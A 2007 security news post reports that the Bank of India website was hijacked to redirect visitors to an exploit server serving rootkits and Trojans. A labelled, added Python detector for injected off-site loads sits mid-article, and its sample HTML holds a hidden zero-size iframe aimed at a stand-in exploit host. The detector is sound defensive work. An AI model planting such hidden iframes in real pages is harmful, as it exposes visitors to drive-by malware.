August 30th, 2007

Bank of India site hijacked, launching exploits

Posted by Ryan Naraine @ 3:26 pm

Categories: Botnets, Browsers, Data theft, Digital rights management, Exploit code, Firefox, Hackers, Metasploit, Microsoft, Passwords, Patch Watch, Pen testing, Responsible disclosure, Rootkits, Spam and Phishing, Spyware and Adware, Viruses and Worms, Vulnerability research, Zero-day attacks

Tags: Bank, Trojan Horse, Malware, Server, Sunbelt Software, Attack, Bank Of India Web Site, Ryan Naraine

The Bank of India Web site has been hijacked by online criminals and is being used to serve up rootkits and backdoor Trojans on unpatched Windows machines.

Malware hunters at Sunbelt Software are warning that a snippet of code has been planted into the Bank of India Web site to redirect surfers to an exploit server.
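The injected redirect described above (a snippet planted in the bank's own pages that sends visitors to a separate exploit server) is something a site operator can check for from the outside by fetching the page and looking at what it makes the browser load from other hosts. The script below is an added example written for this page, not code from the post, from Sunbelt Software or from Bank of India. It parses an HTML document with the standard library, collects script, iframe, frame, object/embed and meta-refresh loads, reports those whose host is outside the site's own domain, and marks the ones styled to be invisible (zero-size or display:none), which is the common shape of a drive-by injection. The sample HTML and the hostnames bank.example, cdn.thirdparty.example and exploit-server.example are constructed for illustration and are not the actual Bank of India snippet.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LoadCollector(HTMLParser):
    """Collects tags that make the browser fetch or navigate to another URL."""

    TAGS = {"script", "iframe", "frame", "embed", "object"}

    def __init__(self):
        super().__init__()
        self.loads = []  # list of (tag, url, attrs)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases attribute names
        if tag in self.TAGS:
            url = a.get("src") or a.get("data")
            if url:
                self.loads.append((tag, url, a))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            # content looks like "0;url=http://host/path"
            content = a.get("content") or ""
            i = content.lower().find("url=")
            if i != -1:
                url = content[i + 4:].strip().strip("'\"")
                self.loads.append(("meta-refresh", url, a))


def _dim_zero(value):
    """True for width/height attributes of 0 or 1 (with or without px)."""
    return value is not None and value.strip().rstrip("px").strip() in ("0", "1")


def _is_hidden(attrs):
    """Heuristic: element is sized or styled so the user never sees it."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (_dim_zero(attrs.get("width")) or _dim_zero(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def find_offsite_loads(html, site_host, allowed=()):
    """Return loads whose host is neither the site nor an allow-listed host.

    Relative URLs are same-origin and skipped; subdomains of site_host count
    as the site. Each finding records the tag, host, URL and a hidden flag.
    """
    parser = _LoadCollector()
    parser.feed(html)
    site = site_host.lower()
    allowed = {h.lower() for h in allowed}
    findings = []
    for tag, url, attrs in parser.loads:
        host = urlparse(url).hostname  # None for relative URLs
        if host is None:
            continue
        host = host.lower()
        if host == site or host.endswith("." + site) or host in allowed:
            continue
        findings.append({"tag": tag, "host": host, "url": url,
                         "hidden": _is_hidden(attrs)})
    return findings


# Constructed sample page: two legitimate loads, one third-party script and
# one zero-size iframe pointing at an off-site host (illustrative only).
SAMPLE_HTML = """<html><head>
<script src="/js/menu.js"></script>
<script src="http://static.bank.example/lib.js"></script>
<script src="http://cdn.thirdparty.example/stats.js"></script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://exploit-server.example/in.cgi?3" width="0" height="0"
        frameborder="0"></iframe>
</body></html>"""


if __name__ == "__main__":
    for f in find_offsite_loads(SAMPLE_HTML, "bank.example"):
        flag = "HIDDEN " if f["hidden"] else ""
        print(f"{flag}{f['tag']:<12} {f['host']:<28} {f['url']}")
```

Most real sites load scripts from advertising or analytics hosts, so the allow-list is what keeps the report short; a hidden iframe or script pointing at a host nobody on the team recognises is the high-signal case. Diffing the findings against a known-good copy of the page is the quickest way to spot an injection like the one reported here.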

There is evidence that the Russian Business Network (RBN), a group known for aggressive malware attacks, is behind this latest high-profile site compromise.

[ SEE: Super Bowl stadium site hacked, seeded with exploits ]

The RBN has been closely linked to the virulent Storm Worm attacks, VML, phishing, child pornography, Torpig, Rustock, and many other criminal attacks to date.

The Bank of India redirect is sending Windows users to a server hosting an e-mail worm file, two rootkits, two Trojan downloaders and three backdoor Trojans.

“Fully patched systems are likely unaffected,” Sunbelt Software president Alex Eckelberry said.

A source tracking the attack tells me the IcePack exploit launcher is the back-end being used for this run of drive-by downloads.

[ UPDATE: 9:00 PM Eastern ] This video (.wmv) from Roger Thompson at Exploit Prevention Labs shows the kind of damage that’s done when an unpatched machine simply surfs to the Bank of India home page.

It’s been almost seven hours since the compromise was discovered but Bank of India is still serving up the malicious redirect code. Malware researchers are working behind the scenes to make contact with the authorities to get the site cleaned and patched.

[ UPDATE #2: August 31, 2007 @ 9:59 AM ] The Bank of India site is now disinfected. This note appears on the home page:

This site is under temporary maintenance and will be available after 19:30 IST

To get a thorough understanding of what was happening at Bank of India during the site compromise, read Dancho Danchev’s blow-by-blow of this attack, which used fast-flux networks to run multiple malware campaigns.

Ryan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal. Here is Ryan's full profile and disclosure of his industry affiliations.